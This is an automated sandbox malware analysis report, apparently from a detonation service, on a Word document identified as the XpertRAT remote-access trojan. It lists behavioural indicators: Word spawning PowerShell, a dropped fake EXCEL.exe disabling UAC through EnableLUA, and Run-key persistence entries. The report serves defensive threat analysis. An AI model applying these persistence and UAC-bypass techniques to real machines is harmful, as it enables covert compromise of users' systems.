Malware Analysis Report

2024-10-19 07:36

Sample ID 210930-tvj5rsacbr
Target Payment_Swift 20210930.doc
SHA256 39c889d91c4bc0fe97e2c565d3a0e103372ba15f988872d049b9277473a87e24
Tags
xpertrat test evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

39c889d91c4bc0fe97e2c565d3a0e103372ba15f988872d049b9277473a87e24

Threat Level: Known bad

The file Payment_Swift 20210930.doc was found to be: Known bad.

Malicious Activity Summary

xpertrat test evasion persistence rat trojan

XpertRAT

XpertRAT Core Payload

Process spawned unexpected child process

UAC bypass

Windows security bypass

Executes dropped EXE

Adds policy Run key to start application

Blocklisted process makes network request

Downloads MZ/PE file

Windows security modification

Loads dropped DLL

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

System policy modification

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-30 16:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-30 16:22

Reported

2021-09-30 16:25

Platform

win7-en-20210920

Max time kernel

149s

Max time network

153s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment_Swift 20210930.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

UAC bypass

evasion trojan

Windows security bypass

evasion trojan

XpertRAT

rat xpertrat

XpertRAT Core Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
